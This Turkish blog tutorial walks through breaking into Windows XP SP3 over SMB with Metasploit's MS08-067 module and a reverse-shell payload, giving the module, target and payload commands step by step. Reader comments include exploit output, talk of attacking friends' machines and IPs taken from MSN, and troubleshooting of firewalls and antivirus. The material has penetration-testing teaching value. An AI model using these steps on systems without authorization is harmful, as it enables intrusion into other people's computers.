• Kategori: Güvenlik
  • Eyüp ÇELİK
  • Gösterim: 10860

MetaSploit ile Windows XP SP3 Sızma (Hacking)

Günümüz bilişim teknolojileri gün geçtikçe hızlanarak yoluna devam etmektedir. 2000’li yıllar ile birlikte bilişim teknolojilerinin kötüye kullanımı gittikçe önem kazanmaya başladı. Sektörde Black Hat olarak nitelendirilen art niyetli bilgisayar korsanları, bilgi teknolojilerinin kötüye kullanım sürecini oldukça ön saflara kadar taşıdılar. Günümüzde neredeyse güvenlik zafiyeti bulunmayan bilişim sistemi kalmamış durumda.

Biz bilişim teknolojileri güvenlik uzmanları olarak güvenlik zafiyetleri ve bu zafiyetlerin nasıl kullanılması gerektiğini bilmek zorundayız. Kendi sistemlerimiz üzerinde penetration (sızma) testleri yaparak sistem güvenliğinizi sağlamak adına çeşitli çalışmalar yapabilirsiniz. Biz penetration test aşamalarında en iyi test aracı olan MetaSploit’i kullanacağız. MetaSploit projesi birçok platforma destek verecek şekilde yapılandırılmıştır. Metasploit yazılım geliştiriciler için çok kolay bir şekilde exploit geliştirme mekanizmasına sahiptir.

Not: Bu makalem, MetaSploit projesini derinlemesine anlatacağım makale serisinin ilk uygulamalı örneği teşkil etmektedir. Bundan sonraki süreçlerde yayınlanacak MetaSploit makalelerim güvenlik açıklarının nasıl exploit edileceğini, MetaSploit platformunda bulunan exploitlerin payloadlar kullanılarak hedef sistemlere nasıl sızılabileceği konularına değinilecektir. MetaSploit projesini anlatacak olan bu makale serisi her zaman olduğu gibi yine Türkiye’de daha önce değinilmemiş uygulamalı güvenlik testlerini anlatacaktır.

Bu makalemde temel amaç;

1-) Bilişim profesyonelleri (Bilgi Güvenliği Danışmanları, Bilgi Güvenliği Uzmanları, Sistem Uzmanları, Bilgi Teknolojileri Uzmanları, Sistem Yöneticileri ve Sistem Mühendisleri)’nin kurmuş oldukları yapıda Windows XP işletim sistemleri üzerinde çalışan 445 (Microsoft-ds) nolu port kullanılarak bir işletim sistemine nasıl sızılacağı,

2-) Önceki makalelerimin okunmuş olması; Footprinting (Bilgi Toplama) evresini anlattığından, hacking olayının ilk aşamaları göstermektedir. Bu açıdan bakacak olursak footprinting (Bilgi toplama) evresinde, Penetration (Sızma) evresinin temellerini sağlamış olacağız.

3-) Scanning (Port Scanning, Vulnerability Scanning ve Network Scanning) aşamalarında toplanmış olan bilgiler Penetration (sızma) aşamasında kullanılacaktır. Bu aşamamız sızma aşamasıdır.

Makalenin Ön Gereklilikleri:

1-) http://www.eyupcelik.com.tr/ceh/samurai-framework-ile-hacking-1 Adresinde bulunan Nmap - Zenmap kullanılarak hedef sistem üzerinde çalışan servisler-portlar hakkında bilgi toplamak.

2-) Makalenin temelini oluşturan aşağıdaki işletim sisteminize uygun MetaSploit programını indirin.

Windows XP – Server2003 – Windows 7 - Windows Vista : http://updates.metasploit.com/data/releases/framework-3.7.2-windows-full.exe

Linux 32 Bit İşletim Sistemleri : http://updates.metasploit.com/data/releases/framework-3.7.2-linux-full.run

Linux 64 Bit İşletim Sistemleri : http://updates.metasploit.com/data/releases/framework-3.7.2-linux-x64-full.run

Unix Platformu : http://updates.metasploit.com/data/releases/framework-3.7.2.tar.bz2

İşletim sisteminize uygun MetaSploit sürümünü indirdikten sonra bilgisayarınıza kurulumunu gerçekleştirin.

Not: İndireceğiz program MetaSploit’in 3.7.2 versiyonlu sürümü olacaktır. Bu makalem Windows XP işletim sistemi üzerinde gerçekleştirilmiş bir sızma makalesidir. Aynı makalenin BackTrack 5 platformunda uygulanacak versiyonu da yakın zaman içerisinde yayınlayacağım. Böylelkle BackTrack 5 kullanıcılarını da unutmamış olacağım.

MetaSploit’i kurduktan sonra Başlat\Tüm Programlar\MetaSploit Framework’tan MetaSploit Update programını çalıştırın. MetaSploit’in yeni yazılmış exploitleri indirip, exploit veritabanını güncellemesini sağlıyoruz.

Please hit enter to exit yazısını görünceye kadar bekliyoruz. Bu yazı geldikten sonra Enter tuşuna basarak MetaSploit Update’i kapatıyoruz. Daha sonra Başlat\Tüm Programlar\MetaSploit Framework’tan MetaSploit Console programını çalıştırıyoruz.

Kısa bir süre sonra MetaSploit konsol penceresi açılacaktır. MetaSploit ilk açıldığında aşağıdaki gibi veritabanı ayarlarını yapacaktır. Bunun nedeni MetaSploit 3.7.2’nin PostgreSQL veritabanını kullanmasıdır.

Gördüğümüz gibi MetaSploit PostgreSQL üzerinde veritabanına tablolar oluşturmaktadır. MetaSploit bir defaya mahsus yaptığı bu işlemden sonra aşağıdaki gibi bir ekran görüntüleyecektir.

MetaSploit’in ana konsol ekranı yukarıdaki gibidir. 28 Haziran 2011 tarihi itibari ile MetaSploit veritabanında 707 Exploit, 359 Auxiliary, 224 Payloads ve 27 Encoder bulunmaktadır. Bu ekran görüntülendiğinde artık MetaSploit’i rahatlıkla kullanabiliriz demektir. Bu aşamaya geldikten sonra yapmamız gereken tek şey Nmap(Zenmap) yardımcı aracını kullanarak (Yada servis bilgilerini alabilen başka bir scanner) 445 (Microsoft-ds) portunu çalıştıran bir Windows işletim sistemi bulmamızdır.

Not: 445 (Microsoft-ds diğer adı ile SMB) portunu kullanarak Windows XP SP3-SP2-SP1, Windows Server 2003 SP2-R2 – SP2 – SP1 gibi işletim sistemlerine nasıl sızılacağını makalenin devamında göreceğiz. Söz konusu portun nasıl açıldığını da kısa şöyle özetlemek istiyorum. Windows işletim sistemlerinde dosya ve yazıcı paylaşımı oluşturulduğunda Microsoft iletişimi sağlamak için 445 numaralı portu kullanır. Bizde dosya ve yazıcı paylaşımı (SMB) portu olan 445’te bulunan bir güvenlik açığını exploit ederek payloads kullanıp sisteme sızmış olacağız. Exploit ve Payloads ile ilgili detaylı bilgiler aşağıdaki gibidir.

Exploit: Temel manada sömürmek anlamına gelmektedir. Sektörde ise bir uygulamanın zafiyetlerini kullanarak o uygulama üzerinden sistemi sömürmek anlamına gelmektedir. Exploitler bir çok programlama dili ile geliştirilebilmektedir. Bu programlama dillerinden sıklıkla kullanılanları, C, C++, Perl, Python’dur.

Payloads: Exploit çalıştırıldıktan sonra, exploitin çalıştığı platform üzerinden yetkisiz giriş işlemini sağlar. Exploit payloadsız çalıştırıldığında yönetimi ele geçirmek olanaksızdır. Bir exploiti çalıştırdıktan sonra yetkileri ele geçirmek için payloadlara ihtiyacımız olacaktır.

Sızma testini uygulayacağımız hedef sistemi tespit ettikten sonra, MetaSploit konsol ekranında show exploits komutu ile MetaSploit üzerinde bulunan exploitleri görüntülüyoruz. Tüm exploitlere bu komut ile bakabiliriz. Exploitler hakkında daha detaylı bilgi almak için info (exploit adı) şeklinde bilgi alabiliriz. Örneğin SMB servisi exploitleri hakkında bilgi alacak isek, info windows/smb/psexec yazarak psexec exploiti hakkında detaylı bilgi alabiliriz. Exploiti kullanmak için use (exploit adı) komutu kullanılır.Örneğin use windows/smb/psexec gibi.

Biz Windows XP işletim sistemine sızmak için MS08_067_netapi exploiti kullanacağız. Bunun için MetaSploit konsol ekranına use windows/smb/ms08_067_netapi yazıyoruz. Komut çıktısı aşağıdaki gibi olacaktır.

Show options komutunu kullanarak exploit üzerinde ayarlanabilir özelliklerine bakıyoruz.

Exploitin ayarlarını show options komutu ile görüntüledik. Exploitin belirteceğimiz hedef üzerinde çalışabilmesini sağlamak için set komutunu kullanarak exploitin ayarlarını değiştireceğiz. MS08_067_netapi exploitinin hedef sistem üzerinde çalışabilmesini sağlamak için hedef sistemin ip adresini söz konusu exploite bildirmemiz gerekir. Bu işlem için set RHOST (Hedef IP Adresi) komutunu kullanacağız. Hedef sistemimizin 192.168.27.50 ip adresine sahip olduğunu varsayarak örnekleyecek olursak, konsol ekranına set RHOST 192.168.27.50 komutunu yazıyoruz.

Yukarıdaki gibi hedef sistemimizi exploite bildiriyoruz. Ardından exploit çalışınca hedef bilgisayarın komut sistemini bize getirmesi için payloads’dan faydalanacağız. MetaSploit üzerinde bulunan tüm payload’ları görüntülemek için show payloads komutunu kullanıyoruz. Biz hedef sistemin komut ekranını getirmesi için shell_reverse_tcp payloads’ını kullanacağız. Bu payloads hedef sisteme ters bağlantı (Reverse Connection) kurup komut penceresini çalıştırmak üzere System yetkileri ile bize geri döndürür.

Yukarıdaki resimde göreceğiniz gibi set payloads windows/shell_reverse_tcp komutu ile hedef sistem exploit edildikten sonra çalıştırılmak üzere payloads’ımızı ayarlıyoruz.

Tüm bu işlemleri yaptıktan sonra geriye çalıştıracağımız tek bir komut kaldı. exploit komutunu çalıştırarak hedef sistemde exploit çalıştırıp payloads ile meterpreter> ekranına düşüyoruz. Artık sisteme sızmış bulunmaktayız.

Hedef sistemin bir screenshot’unu çekerek sisteme sızdığınızı görebilirsiniz. Bunun için konsol ekranına screenshot komutunu girmeniz yeterlidir.

Makalenin uygulanmış haldeki videosunu aşağıdan izleyebilirsiniz.

http://www.youtube.com/watch?v=Cnbb_56Aado

Konu ile ilgili olarak takıldığınız hususlarda alt taraftaki yorum kısmını kullanarak soru sorabilirsiniz.

Herkese güvenli günler dilerim.

 

 

Comments

-2 Burak DALÇIK 25-07-2011 09:07 #1
Makaleniz ve siteniz tamamı ile süper olmuş elinize sağlık.
Hocam şimdi Metasploit ile bende bir çok Windows xp sp2 , sp3 ve Windows 7 ye saldırı yapıyorum fakat çoğunda;
exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.0.0.66:17675
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

Bu şekilde kalıyorum sızmayı başardıklarım da oldu ama yukarıda durumlarda ne oluyor simdi?
Sisteme sızabileceğim fakat başka bir exploir veya payload ilemi denemem gerekir yada hiç sızamazmıyım.
Birde ‘ ms08_067_netapi ‘ exploti ben ‘ 445 portu ‘ açık olan sistemlere sızarken kullanıyorum.
Aslında kafamdaki en buyuk sorulardan biride hangi porta hangi exploit hangi payload kullanılmalıdır.
Quote
+2 Eyüp ÇELİK 25-07-2011 13:03 #2
Alıntılandı Burak DALÇIK:
Makaleniz ve siteniz tamamı ile süper olmuş elinize sağlık.
Hocam şimdi Metasploit ile bende bir çok Windows xp sp2 , sp3 ve Windows 7 ye saldırı yapıyorum fakat çoğunda;
exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 10.0.0.66:17675
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Attempting to trigger the vulnerability...
[*] Exploit completed, but no session was created.

Bu şekilde kalıyorum sızmayı başardıklarım da oldu ama yukarıda durumlarda ne oluyor simdi?
Sisteme sızabileceğim fakat başka bir exploir veya payload ilemi denemem gerekir yada hiç sızamazmıyım.
Birde ‘ ms08_067_netapi ‘ exploti ben ‘ 445 portu ‘ açık olan sistemlere sızarken kullanıyorum.
Aslında kafamdaki en buyuk sorulardan biride hangi porta hangi exploit hangi payload kullanılmalıdır.


Yukarda bazı sistemler üzerinde sızma işlemi yapabildiğini belirtmişsin. Bazı sistemler üzerinde sızma işlemi gerçekleştirilememiş. Bunun bir kaç sebebi olabilir. Sızma işleminin gerçekleşmediği sistemlerde 445 numaralı port açık değildir. Yada 445 numaralı port bir güvenlik cihazı (Programı) tarafından filtreleniyordur. Örneğin 10.0.0.66 ip adresine sahip olan bilgisayar üzerinde bir internet security antivirüs var ise yada 10.0.0.66 ip adresine sahip bilgisayar internal ve external network'e çıkarken firewall üzerinden çıkıyorsa sızma işlemini gerçekleştiremiyorsun demektir. Bu sorunları kontrol etmek için www.eyupcelik.com.tr/ceh/nessus-ile-sirket-ici-pentest-sizma linkte bulunan Nessus ile dehef sistemlerinde bulunan zafiyetleri tarayarak sızma işlemini kontrol edebilirsin.
Quote
0 Burak DALÇIK 25-07-2011 14:21 #3
anladım hocam 445 portu denediğim pc lerde hepsinde acık fakat antivirüsleri devredısı bırakmadım bide onu deneyerek yapayım.denediğim butun pc ler aynı networkte firewall hepsine bakıyor.sonucları tekrar paylasırım.

çok teşkkürler..
Quote
-2 Eyüp ÇELİK 25-07-2011 16:51 #4
Alıntılandı Burak DALÇIK:
anladım hocam 445 portu denediğim pc lerde hepsinde acık fakat antivirüsleri devredısı bırakmadım bide onu deneyerek yapayım.denediğim butun pc ler aynı networkte firewall hepsine bakıyor.sonucları tekrar paylasırım.

çok teşkkürler..


http://www.eyupcelik.com.tr/ceh/samurai-framework-ile-hacking-1 Bu linkten Zenmap kullanım detaylarına bakarsan eğer, hedef sistem üzerinde bulunan servisin filtrelenip filtrelenmediğinide kontrol edebilirsin. Uzaktan servisleri kontrol etmenin en rahat yolu budur.
Quote
0 Aykut 30-11-2011 16:56 #5
Hocam Merhaba ;
metasploit web arayüzüne bir türlü giremiyorum ,
ssl localhost 3970 den girmeye çalıştığımda sertifikanın güvensiz olduğunu söylüyor devam et dediğimde sayfa ölece kalıyor zaman aşımını uğruyor.
Herhangi bir antivirüs , firewall yok bilgisayarda. farklı browserlarda denedim , olurya portu başka bir uygulama kullanıyordur diye kaldırıp birdaha başka bir port üzerinden kurdum nafile.
localhosta bağlanamadığımdan. Armitage falanda kullanamıyorum veritabanlarını kuramıyor malum
ne önerirsiniz yardımcı olursanız sevinirim .
Quote
-2 Aykut 01-12-2011 08:26 #6
he unutmadan hocam. local imde bir sorun yok. nessus'a yada başka uygulamalara browserda https üzerinden bağlanabiliyorum .
Quote
-3 Guest 26-07-2012 00:36 #7
merhaba eyup bey sitenize bir süredir erisemiyordum benim aklımdaki soru deneme amaclı 2 tane arkadasımdan ip aldım ikiside sp3 kullanıyor .. ama yaptıgım seyler ise yaramıyor .. yani nası söyleyim armitage ile scan bile yapınca ipleri hani ne bilim windows xp simgesi bile cıkmıyor bazen add host yapıor ikonu cıkarıyorm atack find yapıyorum ama sag tıkta atack olmuyor ..metasploitde denedim bu yöntemle yine olmuyor.. yani bir türlü yapamadım .. acaba firewall felanmı kullanmasından firewallde degil aslında eset antivirüs o engellyor olabilirmi yada bir portun acık olmasımı gerek karsıda ..yardımcı olursanız sevenirim .. birde eger firewall den kaynaklıysa baska ne yapabilirim hedefe...
Quote
0 Eyüp ÇELİK 29-07-2012 21:16 #8
@Aykut; windows güvenlik duvarın açık mı? Değilse ve aynı sorunu yaşıyorsan Başlat\Çalıştır\CMD yaz. Gelen konsol ekranına "netstat -a -n" yazıp komudu çalıştır. Local Address (Yerel Adres) kısmında TCP 127.0.0.1:3790'ı görüyor musun?

@Guest; Muhtemelen karşı tarafta bir güvenlik duvarı türevinde çalışan bir yazılım mevcut. Eğer ESET internet security sürümünü kullanıyorsa bundan dolayı da bahsettiğiniz sorunu yaşayabilirsiniz. Bunun için size tavsiyem öncelikle Nessus ile tarama yapıp güvenlik zafiyetlerini bulmaya çalışmanızdır. Daha sonraki aşamada Metasploit veya türevi exploit yazılımlarını kullanırsınız.
Quote
-3 Guest 04-09-2012 22:43 #9
Hocam Ben denedim ağ daki xp sp3 işletim sistemli bilgisayarlara direkmen erişim kurdum yanlız bir iki sorum var
1:bu yöntemle msn den aldıgımız ip adresleri ile bilgisayara erişim yapabilirmiyiz
2:windows 7 işletim sistemli bilgisayarlara erişim nasıl kurarız
3:metasploit pro da yeni çıkan güncel exploitleri nasıl kullanırız


Şimdiden teşekür ederim
Quote

Yorum ekle


Güvenlik kodu Yenile

Back to top